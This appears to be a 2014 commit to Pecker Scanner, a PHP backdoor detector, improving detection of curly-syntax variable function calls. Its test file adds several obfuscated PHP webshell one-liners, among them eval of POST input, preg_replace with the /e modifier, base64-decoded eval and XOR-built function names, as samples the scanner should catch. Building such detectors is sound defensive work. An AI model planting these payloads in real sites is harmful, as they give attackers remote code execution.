fix bugs

cfc4n · cfc4n · commit aa00cdbf3340 · 2014-03-06T21:24:05.000+08:00
Bugfix:Missing of the variable used curly syntax. (thanks for XNR https://github.com/chinurho)
diff --git a/CHANGES.cn b/CHANGES.cn
@@ -1,9 +1,15 @@
+Pecker Scanner-0.4.2 [2014-03-06]
+* Bugfix：修复复杂句法规则curly syntax的变量函数漏报问题。(thanks for XNR https://github.com/chinurho)
+
+Pecker Scanner-0.4.2 [2014-03-05]
+* Bugfix：更新template.html中pecker scanner server的网址。
+
 Pecker Scanner-0.4.1 [2014-03-04]
 * Bugfix：更改changes日志记录
 
 Pecker Scanner-0.4.0 [2014-03-03]
 * Bugfix：修复变量中使用"{" 和 "["的语法拼接成的变量函数的漏检。
-* Bugfix：修复引用文件语法后，下一个语法字符不是";"而拼接字符"."的语法。EG:(require '1.dat').'.php'; thanks for poker付 ( http://weibo.com/1776130645 )
+* Bugfix：修复引用文件语法后，下一个语法字符不是";"而拼接字符"."的语法。EG:(require '1.dat').'.php';(thanks for poker付 http://weibo.com/1776130645 )
 * Bugfix：添加 "include"到默认检测配置。
 
 Pecker Scanner-0.3.1 [2013-09-26]
diff --git a/Pecker/Parser.php b/Pecker/Parser.php
@@ -15,7 +15,7 @@
  * @license         http://www.fsf.org/copyleft/gpl.html GNU public license
  * @author          CFC4N <cfc4n@cnxct.com>
  * @package         Parser
- * @version         $Id: Parser.php 28 2014-03-03 03:30:23Z cfc4n $
+ * @version         $Id: Parser.php 29 2014-03-06 12:55:31Z cfc4n $
  */
 
 class Pecker_Parser
@@ -936,7 +936,7 @@ class Pecker_Parser
     protected $errMsg;
     private $tokens;
     private $tokensSkip = array(T_WHITESPACE,T_COMMENT,T_DOC_COMMENT,T_ENCAPSED_AND_WHITESPACE);
-    private $tokensVariable = array('{','}','[',']','.');
+    private $tokensVariable = array('{','}');
 
     /**
      * Creates a parser instance.
@@ -1124,7 +1124,7 @@ public function parse($code) {
     }
     
     /**
-     * get next tokens after a variable
+     * get next tokens after a variable,like curly syntax
      * @param int $k
      * @return array
      */
@@ -1144,7 +1144,7 @@ public function getVariableToken($k)
                 }
                 else
                 {
-                    if (!in_array($this->tokens[$k+$i],$this->tokensVariable))
+                    if (in_array($this->tokens[$k+$i],$this->tokensVariable))
                     {
                         $res = $this->tokens[$k+$i];
                         break;
diff --git a/Pecker/Scanner.php b/Pecker/Scanner.php
@@ -13,7 +13,7 @@
  * @license         http://www.fsf.org/copyleft/gpl.html GNU public license
  * @author          CFC4N <cfc4n@cnxct.com>
  * @package         Scanner
- * @version         $Id: Scanner.php 28 2014-03-03 03:30:23Z cfc4n $
+ * @version         $Id: Scanner.php 29 2014-03-06 12:55:31Z cfc4n $
  */
 class Pecker_Scanner
 {
@@ -186,6 +186,7 @@ private function checkTokens(array $tokens)
                         break;
                     case T_VARIABLE:
                         $ntoken = $this->parser->getNextToken($k);
+//                         var_dump($token,$ntoken);exit();
                         $ptoken = $this->parser->getPreToken($k);
                         if ($ntoken === '(' && $ptoken != '->' && $ptoken !== '::' && $ptoken !== 'function' && $ptoken !== 'new')
                         {
@@ -241,8 +242,31 @@ private function checkTokens(array $tokens)
             }
             elseif($token === '$')
             {
+                /**
+                 * Zend_language_scanner.c : yy56 、yy61
+                 *
+                 $nt = $this->parser->getNextToken($k);
+                 switch ($nt)
+                 {
+                     case '$':
+                         break;
+                     case '\\':
+                         break;
+                     case '{':
+                         break;
+                     default:
+                 }
+                */
                 $nt = $this->parser->getVariableToken($k);
-                if ($nt['token'] === '(')
+                if ($nt['token'] === '{')
+                {
+                    $nt1 = $this->parser->getVariableToken($k+$nt['key']+1);
+                    if ($nt1['token'] === '}' && $this->parser->getNextToken($k+$nt['key']+$nt1['key']+2) === '(')
+                    {
+                        $this->report->catchLog('${'.$nt1['func'].'}', 0,$this->parser->getPieceTokenAll($nt1['key']+$k+1));
+                    }
+                }
+                elseif($nt['token'] === '(')
                 {
                     $this->report->catchLog('$'.$nt['func'], 0,$this->parser->getPieceTokenAll($nt['key']+$k));
                 }
diff --git a/PeckerLite/PeckerScanner.lite.php b/PeckerLite/PeckerScanner.lite.php
@@ -15,7 +15,7 @@
  * @license         http://www.fsf.org/copyleft/gpl.html GNU public license
  * @author          CFC4N <cfc4n@cnxct.com>
  * @package         Lexer All
- * @version         $Id: PeckerScanner.lite.php 1 2013-10-28 10:34:53Z cfc4n $
+ * @version         $Id: PeckerScanner.lite.php 29 2014-03-06 12:55:31Z cfc4n $
  */
 
 class Pecker_Scanner
@@ -189,6 +189,7 @@ private function checkTokens(array $tokens)
                         break;
                     case T_VARIABLE:
                         $ntoken = $this->parser->getNextToken($k);
+                        //                         var_dump($token,$ntoken);exit();
                         $ptoken = $this->parser->getPreToken($k);
                         if ($ntoken === '(' && $ptoken != '->' && $ptoken !== '::' && $ptoken !== 'function' && $ptoken !== 'new')
                         {
@@ -244,8 +245,31 @@ private function checkTokens(array $tokens)
             }
             elseif($token === '$')
             {
+                /**
+                 * Zend_language_scanner.c : yy56 、yy61
+                 *
+                 $nt = $this->parser->getNextToken($k);
+                 switch ($nt)
+                 {
+                 case '$':
+                 break;
+                 case '\\':
+                 break;
+                 case '{':
+                 break;
+                 default:
+                 }
+                 */
                 $nt = $this->parser->getVariableToken($k);
-                if ($nt['token'] === '(')
+                if ($nt['token'] === '{')
+                {
+                    $nt1 = $this->parser->getVariableToken($k+$nt['key']+1);
+                    if ($nt1['token'] === '}' && $this->parser->getNextToken($k+$nt['key']+$nt1['key']+2) === '(')
+                    {
+                        $this->report->catchLog('${'.$nt1['func'].'}', 0,$this->parser->getPieceTokenAll($nt1['key']+$k+1));
+                    }
+                }
+                elseif($nt['token'] === '(')
                 {
                     $this->report->catchLog('$'.$nt['func'], 0,$this->parser->getPieceTokenAll($nt['key']+$k));
                 }
@@ -293,6 +317,7 @@ private function _hasCallback($str)
     }
 }
 
+
 class Pecker_Lexer
 {
     protected $code;
@@ -460,7 +485,6 @@ public function getTokens()
 }
 
 
-
 class Pecker_Parser
 {
     const TOKEN_NONE    = -1;
@@ -1379,7 +1403,7 @@ class Pecker_Parser
     protected $errMsg;
     private $tokens;
     private $tokensSkip = array(T_WHITESPACE,T_COMMENT,T_DOC_COMMENT,T_ENCAPSED_AND_WHITESPACE);
-    private $tokensVariable = array('{','}','[',']','.');
+    private $tokensVariable = array('{','}');
 
     /**
      * Creates a parser instance.
@@ -1567,7 +1591,7 @@ public function parse($code) {
     }
 
     /**
-     * get next tokens after a variable
+     * get next tokens after a variable,like curly syntax
      * @param int $k
      * @return array
      */
@@ -1587,7 +1611,7 @@ public function getVariableToken($k)
                 }
                 else
                 {
-                    if (!in_array($this->tokens[$k+$i],$this->tokensVariable))
+                    if (in_array($this->tokens[$k+$i],$this->tokensVariable))
                     {
                         $res = $this->tokens[$k+$i];
                         break;
@@ -1795,9 +1819,6 @@ public function getErrmsg()
     }
 }
 
-
-
-
 class Pecker_Loger
 {
     protected $result;
diff --git a/test/1.php b/test/1.php
@@ -13,7 +13,7 @@
  * @license         http://www.fsf.org/copyleft/gpl.html GNU public license
  * @author          CFC4N <cfc4n@cnxct.com>
  * @package         demo
- * @version         $Id$
+ * @version         $Id: 1.php 29 2014-03-06 12:55:31Z cfc4n $
  */
 
 $str = 'base64_decode';
@@ -58,4 +58,46 @@ function exec()                 //pass
 $b{0}('ipconfig');    //get is
 echo $b[0];    //pass
 echo $b{0};    //pass
-?>
+
+${@func1}();    //get it
+$$a();    //get it
+${true?$func1:$func2}();    //get it
+${2+1}();    //get it
+${2+1};    //pass
+${@func};    //pass
+
+
+@preg_replace("/[pageerror]/e",$_POST['error'],"cfc");    //get it
+header('HTTP/1.1 404 Not Found');
+
+preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a');    //get it
+
+if(reset($a) == '10' && count($a) == 9) {
+    eval(base64_decode(str_replace(" ", "+", implode(array_slice($a, 6)))));        //get it
+}
+
+($_=@$_GET[2]).@$_($_POST[1]);        //get it
+
+$_="";
+$_[+""]='';
+$_="$_"."";
+$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");        //get it
+
+$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
+$hh("/[discuz]/e",$_POST['h'],"Access");        //get it
+${'_'.$_}['_'](${'_'.$_}['__']);    //get it
+?>
+<script language="php">@eval($_POST[sb])</script>        //get it
+ 
+<?php
+@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";
+@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";
+@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}
+[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);    //get it
+
+$_="";
+$_[+""]='';
+$_="$_"."";
+$_=($_[+""]|"0x06").($_[+""]|"0x05").($_[+""]^"0x15");        //get it
+?>
+<?=${'_'.$_}['_'](${'_'.$_}['__']);?>

Original file line number	Diff line number	Diff line change
`@@ -15,7 +15,7 @@`
`15`	`15`	`* @license http://www.fsf.org/copyleft/gpl.html GNU public license`
`16`	`16`	`* @author CFC4N <[email protected]>`
`17`	`17`	`* @package Lexer All`
`18`		`- * @version $Id: PeckerScanner.lite.php 1 2013-10-28 10:34:53Z cfc4n $`
	`18`	`+ * @version $Id: PeckerScanner.lite.php 29 2014-03-06 12:55:31Z cfc4n $`
`19`	`19`	`*/`
`20`	`20`
`21`	`21`	`class Pecker_Scanner`
`@@ -189,6 +189,7 @@ private function checkTokens(array $tokens)`
`189`	`189`	`break;`
`190`	`190`	`case T_VARIABLE:`
`191`	`191`	`$ntoken = $this->parser->getNextToken($k);`
	`192`	`+ // var_dump($token,$ntoken);exit();`
`192`	`193`	`$ptoken = $this->parser->getPreToken($k);`
`193`	`194`	`if ($ntoken === '(' && $ptoken != '->' && $ptoken !== '::' && $ptoken !== 'function' && $ptoken !== 'new')`
`194`	`195`	`{`
`@@ -244,8 +245,31 @@ private function checkTokens(array $tokens)`
`244`	`245`	`}`
`245`	`246`	`elseif($token === '$')`
`246`	`247`	`{`
	`248`	`+ /**`
	`249`	`+ * Zend_language_scanner.c : yy56 、yy61`
	`250`	`+ *`
	`251`	`+ $nt = $this->parser->getNextToken($k);`
	`252`	`+ switch ($nt)`
	`253`	`+ {`
	`254`	`+ case '$':`
	`255`	`+ break;`
	`256`	`+ case '\\':`
	`257`	`+ break;`
	`258`	`+ case '{':`
	`259`	`+ break;`
	`260`	`+ default:`
	`261`	`+ }`
	`262`	`+ */`
`247`	`263`	`$nt = $this->parser->getVariableToken($k);`
`248`		`- if ($nt['token'] === '(')`
	`264`	`+ if ($nt['token'] === '{')`
	`265`	`+ {`
	`266`	`+ $nt1 = $this->parser->getVariableToken($k+$nt['key']+1);`
	`267`	`+ if ($nt1['token'] === '}' && $this->parser->getNextToken($k+$nt['key']+$nt1['key']+2) === '(')`
	`268`	`+ {`
	`269`	`+ $this->report->catchLog('${'.$nt1['func'].'}', 0,$this->parser->getPieceTokenAll($nt1['key']+$k+1));`
	`270`	`+ }`
	`271`	`+ }`
	`272`	`+ elseif($nt['token'] === '(')`
`249`	`273`	`{`
`250`	`274`	`$this->report->catchLog('$'.$nt['func'], 0,$this->parser->getPieceTokenAll($nt['key']+$k));`
`251`	`275`	`}`
`@@ -293,6 +317,7 @@ private function _hasCallback($str)`
`293`	`317`	`}`
`294`	`318`	`}`
`295`	`319`
	`320`	`+`
`296`	`321`	`class Pecker_Lexer`
`297`	`322`	`{`
`298`	`323`	`protected $code;`
`@@ -460,7 +485,6 @@ public function getTokens()`
`460`	`485`	`}`
`461`	`486`
`462`	`487`
`463`		`-`
`464`	`488`	`class Pecker_Parser`
`465`	`489`	`{`
`466`	`490`	`const TOKEN_NONE = -1;`
`@@ -1379,7 +1403,7 @@ class Pecker_Parser`
`1379`	`1403`	`protected $errMsg;`
`1380`	`1404`	`private $tokens;`
`1381`	`1405`	`private $tokensSkip = array(T_WHITESPACE,T_COMMENT,T_DOC_COMMENT,T_ENCAPSED_AND_WHITESPACE);`
`1382`		`- private $tokensVariable = array('{','}','[',']','.');`
	`1406`	`+ private $tokensVariable = array('{','}');`
`1383`	`1407`
`1384`	`1408`	`/**`
`1385`	`1409`	`* Creates a parser instance.`
`@@ -1567,7 +1591,7 @@ public function parse($code) {`
`1567`	`1591`	`}`
`1568`	`1592`
`1569`	`1593`	`/**`
`1570`		`- * get next tokens after a variable`
	`1594`	`+ * get next tokens after a variable,like curly syntax`
`1571`	`1595`	`* @param int $k`
`1572`	`1596`	`* @return array`
`1573`	`1597`	`*/`
`@@ -1587,7 +1611,7 @@ public function getVariableToken($k)`
`1587`	`1611`	`}`
`1588`	`1612`	`else`
`1589`	`1613`	`{`
`1590`		`- if (!in_array($this->tokens[$k+$i],$this->tokensVariable))`
	`1614`	`+ if (in_array($this->tokens[$k+$i],$this->tokensVariable))`
`1591`	`1615`	`{`
`1592`	`1616`	`$res = $this->tokens[$k+$i];`
`1593`	`1617`	`break;`
`@@ -1795,9 +1819,6 @@ public function getErrmsg()`
`1795`	`1819`	`}`
`1796`	`1820`	`}`
`1797`	`1821`
`1798`		`-`
`1799`		`-`
`1800`		`-`
`1801`	`1822`	`class Pecker_Loger`
`1802`	`1823`	`{`
`1803`	`1824`	`protected $result;`